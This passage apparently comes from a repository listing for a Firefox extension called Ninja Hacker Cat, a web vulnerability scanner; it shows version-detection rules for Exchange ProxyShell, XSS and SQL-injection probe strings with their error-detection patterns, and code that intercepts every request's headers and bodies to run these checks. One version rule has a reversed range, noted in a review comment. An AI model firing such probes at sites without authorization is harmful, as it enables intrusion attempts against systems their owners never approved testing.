"css-font-path", 83 | cat: "cat-panic", 84 | critLevel: 3 85 | }, { 86 | title: "RCE: Exchange 2016 Proxyshell (CVE-2021-34473)", 87 | minVersion: "15.2.221", 88 | maxVersion: "15.1.2308", 89 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 90 | tags: ["exchange", "owa"], 91 | detectedBy: "css-font-path", 92 | cat: "cat-panic", 93 | critLevel: 3 94 | }, 
{
    // NOTE(review): minVersion is above maxVersion here, and 15.0.1497 is the build the
    // Exchange 2013 entry earlier in this list uses while this title says 2016. This looks
    // like a copy-paste slip that may leave the rule unable to match; confirm the range.
    title: "RCE: Exchange 2016 Proxyshell (CVE-2021-34473)",
    minVersion: "15.2.221",
    maxVersion: "15.0.1497",
    regexVersion: "auth\\/([\\d\\.]+)\/themes",
    tags: ["exchange", "owa"],
    detectedBy: "css-font-path",
    cat: "cat-panic",
    critLevel: 3
}]

// --------------------------------------------------------------------------------
// /rules/web.js:
// --------------------------------------------------------------------------------
// Generic web rules. Each entry lists the values in `params` and the strings in
// `detectResponses`; how they are sent and matched is decided by the engine, which is
// not part of this file.
// NOTE(review): "syntax error" and "order by" also occur in ordinary page text, so if the
// engine does a plain substring match these hits need manual confirmation. Verify.
export const web = [
    {
        title: "XSS: Cross Site Scripting",
        params: ["\"'>"],
        detectResponses: ["\"'>"],
        tags: ["get-param"],
        cat: "cat-love",
        critLevel: 2
    },
    {
        title: "SQLI: SQL Injection Error Page",
        params: ["'", "\"'"],
        detectResponses: ["syntax error", "order by"],
        tags: ["get-param"],
        cat: "cat-love",
        critLevel: 2
    }
];

// --------------------------------------------------------------------------------
// /scripts/background.js:
// --------------------------------------------------------------------------------
let myWindowId = null;

/**
 * Toolbar-button handler: opens the panel tab unless a tab in this window already
 * carries one of the two panel titles.
 */
function nhc_toggleNinjaHackerCat() {
    // NOTE(review): a tab title is set by the page itself, so any page in this window can
    // carry one of these titles and keep the panel from opening. Matching tab.url against
    // browser.runtime.getURL("/panel.html") would be harder to imitate; confirm that the
    // manifest's permissions expose tab.url before switching.
    const panelTitles = [
        "✔ Active Ninja Hacker Cat",
        "💤 Sleeping Ninja Hacker Cat"
    ];

    browser.tabs.query({ windowId: myWindowId }).then((tabs) => {
        const panelIsOpen = tabs.some((tab) => panelTitles.includes(tab.title));
        if (panelIsOpen) {
            return;
        }

        browser.tabs.create({
            index: 0,
            url: "/panel.html",
            active: true
        });
        browser.browserAction.setIcon({
            path: {
                16: "/images/cat-default.png",
                32: "/images/cat-default.png"
            }
        });
    });
}

// Remember the window this background script belongs to; the tab query above uses it.
browser.windows.getCurrent({ populate: true }).then((windowInfo) => {
    myWindowId = windowInfo.id;
});

browser.browserAction.onClicked.addListener(nhc_toggleNinjaHackerCat);
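// --------------------------------------------------------------------------------
// /scripts/main.js:
// --------------------------------------------------------------------------------
import { leakUrls } from "../rules/leak-urls.js";
import { poc } from "../rules/poc.js";
import { web } from "../rules/web.js";
import { tags } from "../engine/tags.js";
import { fuzzing } from "../rules/fuzzing.js";
import { versions } from "../rules/versions.js";

import { engine } from "../engine/engine.js";
import { fuzzing_engine } from "../engine/fuzzing.js";

let myWindowId;
const check_automatically = document.querySelector("#autoRequest");

// Request types that are assembled and handed to main(). Every webRequest listener
// below uses the same filter, so no entry is stored that nothing will ever consume.
const WATCHED_TYPES = ["main_frame", "xmlhttprequest"];

// NOTE(review): the listing shows an empty string as the URL pattern, which is not a
// valid match pattern; "<all_urls>" is assumed here. Confirm against the repository.
const WATCHED_URLS = ["<all_urls>"];

// String.fromCharCode.apply() is called on slices of this size, because spreading a
// whole large body into one call can exceed the engine's argument limit.
const DECODE_CHUNK = 0x8000;

/**
 * Mirror the "check automatically" checkbox into the tab title, the toolbar icon and
 * the rule checkboxes.
 *
 * @param {boolean} isActive - current state of the #autoRequest checkbox
 */
function applyActivationState(isActive) {
    // Info: title is used to check if this tab is open
    document.title = isActive
        ? "✔ Active Ninja Hacker Cat"
        : "💤 Sleeping Ninja Hacker Cat";

    const icon = isActive
        ? "/images/cat-default.png"
        : "/images/cat-default-grey.png";
    browser.browserAction.setIcon({ path: { 16: icon, 32: icon } });

    document.querySelectorAll(".checkbox-rules").forEach((element) => {
        element.classList.toggle("checkbox-deactivated", !isActive);
    });
}

// toggle toolbar icons
check_automatically.addEventListener("click", () => {
    applyActivationState(check_automatically.checked);
});

// global stuff
window.nhc_requestCounter = 0;
window.nhc_requestGapTimer = 100;
window.nhc_currentCritLevel = 0;
window.nhc_requestedUrls = [];

/**
 * Run the enabled rule sets against one completed request.
 *
 * Nothing happens unless the #autoRequest checkbox is ticked. A request is only
 * handed to the engines when its hostname equals the hostname of the active tab, so
 * resources the page loads from other hosts are not checked.
 *
 * @param {object} requestDetails - request record assembled by the webRequest
 *     listeners below (url, requestHeaders, responseHeaders, optional body fields)
 */
function main(requestDetails) {
    // start checks or skip checks
    if (!check_automatically.checked) {
        return;
    }

    browser.tabs.query({ windowId: myWindowId, active: true })
        .then(async (tabs) => {
            // check if at least 1 tab is active
            const activeTabUrl = tabs?.[0]?.url;
            if (!activeTabUrl) {
                return;
            }
            // skip internal about pages
            if (activeTabUrl.startsWith("about:")) {
                return;
            }

            const currentRequestUrl = requestDetails.url;
            const activeDomain = new URL(activeTabUrl).hostname;
            const currentDomain = new URL(currentRequestUrl).hostname;

            // only check request from current active tab
            if (activeDomain !== currentDomain) {
                return;
            }

            // detect software, version
            const detectedTags = await tags(currentRequestUrl);
            const isChecked = (selector) => document.querySelector(selector).checked;

            // run simple checks based on url
            if (isChecked("#checkboxWeb")) {
                engine(web, detectedTags, currentRequestUrl);
            }
            if (isChecked("#checkboxCritPOC")) {
                engine(poc, detectedTags, currentRequestUrl);
            }
            if (isChecked("#checkboxVersions")) {
                engine(versions, detectedTags, currentRequestUrl);
            }

            // run fuzzing based on current captured request
            if (isChecked("#checkboxFuzzing")) {
                fuzzing_engine(fuzzing, requestDetails);
            }

            // run simple checks based on url
            if (isChecked("#checkboxLeaks")) {
                engine(leakUrls, detectedTags, currentRequestUrl);
            }
        })
        .catch((error) => {
            // Without this handler a failure in tags() or new URL() is an unhandled rejection.
            console.error("Ninja Hacker Cat: check failed for", requestDetails.url, error);
        });
}

// webrequest interception and global buildup to get a full request
// A Map keyed by requestId; entries are removed on completion and on error.
const globalRequests = new Map();

/**
 * Turn the first raw upload part of a request body into a string.
 *
 * @param {Array<object>|undefined} rawParts - requestBody.raw from onBeforeRequest
 * @returns {string|undefined} the decoded body, or undefined when there is no raw body
 *     or it cannot be decoded (decodeURIComponent throws on malformed % sequences,
 *     which binary or multipart bodies commonly contain)
 */
function decodeRawBody(rawParts) {
    if (!rawParts) {
        return undefined;
    }
    try {
        const bytes = new Uint8Array(rawParts[0]?.bytes ?? 0);
        let text = "";
        for (let offset = 0; offset < bytes.length; offset += DECODE_CHUNK) {
            text += String.fromCharCode.apply(
                null,
                bytes.subarray(offset, offset + DECODE_CHUNK)
            );
        }
        return decodeURIComponent(text);
    } catch (error) {
        console.warn("Request body could not be decoded: ", error.message);
        return undefined;
    }
}

browser.webRequest.onBeforeRequest.addListener(
    (request) => {
        globalRequests.set(request.requestId, request);

        // save body of request
        const bodyString = decodeRawBody(request.requestBody?.raw);
        if (bodyString !== undefined) {
            request.requestBodyString = bodyString;
        }
        if (request.requestBodyString) {
            try {
                request.requestBodyJSON = JSON.parse(request.requestBodyString);
            } catch {
                console.warn("JSON parser failed: ", request.url);
            }
        }
        // The record is deliberately not written to the console: it holds request
        // bodies, which can carry credentials and session tokens.
    },
    { urls: WATCHED_URLS, types: WATCHED_TYPES },
    ["requestBody"]
);

browser.webRequest.onBeforeSendHeaders.addListener(
    (request) => {
        // The record is missing when the request started before this page registered
        // its listeners.
        const tracked = globalRequests.get(request.requestId);
        if (tracked) {
            tracked.requestHeaders = request.requestHeaders;
        }
    },
    { urls: WATCHED_URLS, types: WATCHED_TYPES },
    ["requestHeaders"]
);

browser.webRequest.onHeadersReceived.addListener(
    (request) => {
        const tracked = globalRequests.get(request.requestId);
        if (tracked) {
            tracked.responseHeaders = request.responseHeaders;
        }
    },
    { urls: WATCHED_URLS, types: WATCHED_TYPES },
    ["responseHeaders"]
);

browser.webRequest.onCompleted.addListener(
    (request) => {
        const currentRequest = globalRequests.get(request.requestId);
        globalRequests.delete(request.requestId);

        // Without recorded request headers it is impossible to tell whether this was one
        // of the extension's own requests, so it is not processed (and cannot re-trigger
        // checks on itself).
        if (!currentRequest?.requestHeaders) {
            return;
        }

        // filter my own requests based on header; header names are case-insensitive
        const isOwnRequest = currentRequest.requestHeaders.some(
            (header) => header.name.toLowerCase() === "x-requested-with"
                && header.value === "Ninja Hacker Cat"
        );
        if (!isOwnRequest) {
            main(currentRequest);
        }
    },
    { urls: WATCHED_URLS, types: WATCHED_TYPES }
);

// Failed or aborted requests never reach onCompleted; drop their records, which may
// include the request body, instead of keeping them for the lifetime of the page.
browser.webRequest.onErrorOccurred.addListener(
    (request) => {
        globalRequests.delete(request.requestId);
    },
    { urls: WATCHED_URLS, types: WATCHED_TYPES }
);

// window stuff to query tabs
browser.windows.getCurrent({ populate: true }).then((windowInfo) => {
    myWindowId = windowInfo.id;
});

// show default cat
document.querySelector("#cat-default").style.display = "block";

// reset click event
document.querySelector("#reset").addEventListener("click", () => {
    document.querySelectorAll(".avatar").forEach((avatar) => {
        avatar.style.display = "none";
    });
    document.querySelector("#cat-default").style.display = "block";
    window.nhc_currentCritLevel = 0;
    window.nhc_requestCounter = 0;
    window.nhc_requestedUrls = [];
    document.querySelector("#messageBox").replaceChildren();
    document.querySelector("#reset").classList.add("hidden");
});

// --------------------------------------------------------------------------------
// /sounds/miau1.mp3:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/sounds/miau1.mp3
// --------------------------------------------------------------------------------
// /sounds/miau2.mp3:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/sounds/miau2.mp3
// --------------------------------------------------------------------------------
// /trash.svg:
// --------------------------------------------------------------------------------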